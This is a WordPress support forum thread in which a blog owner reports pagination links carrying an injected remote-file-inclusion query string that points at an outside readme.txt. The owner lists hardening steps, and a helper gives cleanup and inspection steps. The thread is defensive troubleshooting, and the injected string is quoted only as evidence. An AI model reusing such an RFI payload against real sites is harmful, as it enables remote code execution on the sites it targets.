Blog hacked

  • Long post below, but my thanks in advance for taking the time to read this. My blog was recently hacked and I have been struggling for a week to figure out how it was done. Here’s my blog:

    https://theawesomer.com

    The hack manifests itself if you click on the page numbers at the bottom of the page. E.g., the links have been appended with:

    ?_SERVERDOCUMENT_ROOT=http%3A%2F%2Fwww.peb.com.ua%2Fua%2Freadme.txt%3F%3F%3F

    Several notes:
    1. The modified links are transient. I have personally seen the hacked links there one minute, gone the next–despite having done nothing on my end. The majority of visitors never see these hacked links.
    2. The hack doesn’t seem to do anything, and may have been a failed attempt. It doesn’t actually redirect or launch any application.
    3. These modified links are seen on the site itself, not just server logs and traffic statistics. I’ve seen them myself, as have several colleagues and concerned visitors.

    I am a total neophyte to hacking, but after some googling I think I narrowed it down to an RFI (remote file inclusion) hack. I turned Off register_globals, allow_url_fopen, and allow_url_include. They were all set to On previously.

    I also:
    1. Upgraded WordPress from 2.6. to 2.8.1 (and now 2.8.2 with the XSS fix)
    2. Upgraded all plugins
    3. Set .htaccess to block libwww-perl and prevent query strings with “http” in them
    4. Set Super Cache to stop cacheing /page/.

    I paid special attention to my pagination plugin, since that’s where the hack manifests itself. I was previously using Lester Chan’s WP-pagenavi which I upgraded along with WordPress. The result — no change. So, I tried another pagination plugin, WP Page Numbers — still no change.

    By far the most effective measure has been setting Super Cache to stop caching /page/, but this has not stopped the hacks completely.

    I still see them in my Apache logs. The IPs seem to be legitimate traffic (normal visitors), proven by the fact that I and my friends have seen the same hacked links on our computers. Shouldn’t an RFI attack originate remotely? Why has it been able to actually modify my links?

    I’ve even downloaded a complete copy of all files in my public_html directory (including all WordPress files) and exported my MySQL database to search for any trace of the hack — “peb.com.ua” or “DOCUMENT_ROOT” — and it’s just not there.

    So, I guess my questions are these: What exactly is happening to my site, and how do I keep it from happening again?

    Thank you!

Viewing 3 replies - 1 through 3 (of 3 total)

  • $DOCUMENT_ROOT is a predefined variable in php.

    when you say you downloaded the files and are are looking for any trace … how are you looking? You wont find that file name anywhere. Its not a file

    I cant tell or not if you know that, which is why im asking.

    Ive more to say but ill wait.

    Your links are changed.

    disable then **DELETE ALL your plugins off the server.

    do the links go back to being normal?

    No ->

    Change to a FRESHLY uploaded copy of the default theme. **DELETE all the other themes off the server.

    do the links go back to being normal?

    No ->

    Inside your database, in the options table is a row that stores your active plugins – MAKE SURE that you dont have any hidden malicious plugins being loaded. You can tell because the path wont be to the normal plugins/plugin name.. it will be /tmp/xcrts.php or some crap like that.

    If you find any entries like that — come back here and share.

    Ive ommitted the “reupload ALL fresh files” option because Im giving you the benefit of the doubt that you deleted before uploading. You need to make sure that there are NO stray files left in any dirs, and that ALL of wordpress files on your site are 2.8.2 files — not 2.8.2 files with some leftover 2.6.x files… etc..

    Any files or dirs not previously mentioned above that havent been uploaded fresh, need to be opened and looked at : wp-config.php, for example.

    Housekeeping is key.

    Finally, when I said “**DELETE” in the first cpl paragraphs above — you can download backups of those dirs to your local machine, and then delete them.

    Thread Starter aznbbj

    (@aznbbj)

    Thanks whooami! I will try the steps you suggested and get back to you with my findings.

    In answer to your first question, I used grep while ssh’d to my server and OS X’s spotlight after I had downloaded all my files+database to search for any “peb.com.ua” or “document” occurrences within my files.

    The first search for peb.com.ua came up negative, while the second search found this line in xmlrpc.php twice:

    $filename = preg_replace('#https?://.+?/#', $_SERVER['DOCUMENT_ROOT'].'/', $filename);

    … which seems to be normal?

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Blog hacked’ is closed to new replies.